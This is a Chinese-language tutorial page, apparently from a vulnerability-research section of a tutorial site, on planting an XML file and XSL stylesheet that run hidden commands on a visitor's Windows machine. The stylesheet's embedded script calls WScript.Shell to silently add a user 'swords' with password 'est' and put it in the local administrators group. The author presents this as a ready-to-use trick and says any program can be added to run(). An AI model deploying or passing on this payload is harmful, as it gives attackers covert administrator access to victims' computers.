利用xml+xsl给客户机添加超级管理帐户!_漏洞研究教程-查字典教程网
利用xml+xsl给客户机添加超级管理帐户!
利用xml+xsl给客户机添加超级管理帐户!
发布时间:2016-12-26 来源:查字典编辑
摘要:用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run...

用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.

这个程序加了一个用户为 swords,密码为est的超级管理员账号。

swords.xml

<?xml version="1.0" encoding="GB2312"?>

<?xml-stylesheet type="text/xsl" href="swords.xsl"?>

<name>I am swords,I am admin!</name>

swords.xsl

<?xml version="1.0" encoding="gb2312"?>

<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">

<xsl:template match="/">

<html>

<body>

<xsl:value-of select="name" />

<xsl:script>

function run()

{

var wsh;

var wsh = new ActiveXObject("WScript.Shell");

wsh.run( "net user swords est /add",0);

wsh.run( "net localgroup administrators swords /add",0);

wsh.run( "cmd.exe /c echo test!");

}

</xsl:script>

<xsl:eval>run()</xsl:eval>

</body>

</html>

</xsl:template>

</xsl:stylesheet>

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类